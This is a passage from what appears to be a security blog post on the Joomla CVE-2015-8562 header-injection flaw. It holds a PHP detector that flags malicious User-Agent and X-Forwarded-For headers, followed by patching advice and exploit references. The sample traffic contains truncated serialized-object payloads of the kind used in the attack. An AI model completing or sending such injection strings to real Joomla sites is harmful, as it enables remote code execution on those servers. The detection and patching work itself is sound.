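function scan_requests(array $requests): array
{
    $hits = [];
    foreach ($requests as $req) {
        $headers = ['User-Agent' => $req['ua'] ?? null, 'X-Forwarded-For' => $req['xff'] ?? null];
        foreach ($headers as $name => $value) {
            if ($value === null) {
                continue;
            }
            $reasons = cve_2015_8562_indicators($value);
            if ($reasons !== []) {
                $hits[] = ['ip' => $req['ip'], 'header' => $name, 'reasons' => $reasons];
            }
        }
    }
    return $hits;
}

/** Constructed sample traffic: two ordinary clients, one PoC-shaped User-Agent
 *  (truncated; the full chain is not needed to recognise it) and one payload
 *  arriving through X-Forwarded-For instead. */
function sample_requests(): array
{
    return [
        ['ip' => '203.0.113.10', 'ua' => 'Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0'],
        ['ip' => '203.0.113.11', 'ua' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/46.0.2490.86 Safari/537.36',
         'xff' => '198.51.100.7'],
        ['ip' => '203.0.113.12', 'ua' => '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}' . "\xf0\xfd\xfd\xfd"],
        ['ip' => '203.0.113.13', 'ua' => 'curl/7.47.0',
         'xff' => 'O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}}'],
    ];
}

/** Self-check on the samples: exactly the two injected headers are flagged. */
function selfcheck(): bool
{
    $hits = scan_requests(sample_requests());
    return count($hits) === 2
        && $hits[0]['ip'] === '203.0.113.12' && $hits[0]['header'] === 'User-Agent'
        && count($hits[0]['reasons']) === 4
        && $hits[1]['ip'] === '203.0.113.13' && $hits[1]['header'] === 'X-Forwarded-For';
}

if (PHP_SAPI === 'cli') {
    foreach (scan_requests(sample_requests()) as $hit) {
        printf("%s %s: %s\n", $hit['ip'], $hit['header'], implode('; ', $hit['reasons']));
    }
    echo selfcheck() ? "self-check passed\n" : "self-check FAILED\n";
}
```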
<h1>
What to do now???</h1>
If you own a Joomla! website, go and check if it is vulnerable. You can use the following online service.<br />
<a href="https://scan.patrolserver.com/joomla/CVE-2015-8562">https://scan.patrolserver.com/joomla/CVE-2015-8562</a><br />
<img alt="" class="aligncenter" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC18.png" /><br />
If it is vulnerable, time to patch it.<br />
[<span class="lG">pardot</span>-form id=”19510″ title=”OenTechnation”]<br />
<h1>
How to patch:</h1>
<h2>
Joomla versions 1.5.x and 2.5.x (EOL)</h2>
If you are using the old and unsupported versions 1.5.x or 2.5.x, you
have to apply these hotfixes released by the Joomla development team.<br />
1.5.x: <a href="https://github.com/joomla/joomla-cms/releases/download/3.4.6/SessionFix15v2.zip" target="_blank">Session Fix Joomla 1.5.x</a><br />
2.5.x: <a href="https://github.com/joomla/joomla-cms/releases/download/3.4.6/SessionFix25v1.zip" target="_blank">Session Fix Joomla 2.5.x</a><br />
<h2>
Joomla versions 3.x</h2>
Update immediately to version 3.4.6.<br />
Note: These workarounds have been taken from the above mentioned online scanning website (<a href="https://scan.patrolserver.com/joomla/CVE-2015-8562">https://scan.patrolserver.com/joomla/CVE-2015-8562</a>).<br />
<br />
<h1>
References:</h1>
<a href="https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html">https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html</a><br />
<a href="http://pastebin.com/PRiK0SWL">http://pastebin.com/PRiK0SWL</a><br />
<a href="https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/joomla_http_header_rce.rb">https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/joomla_http_header_rce.rb</a></div>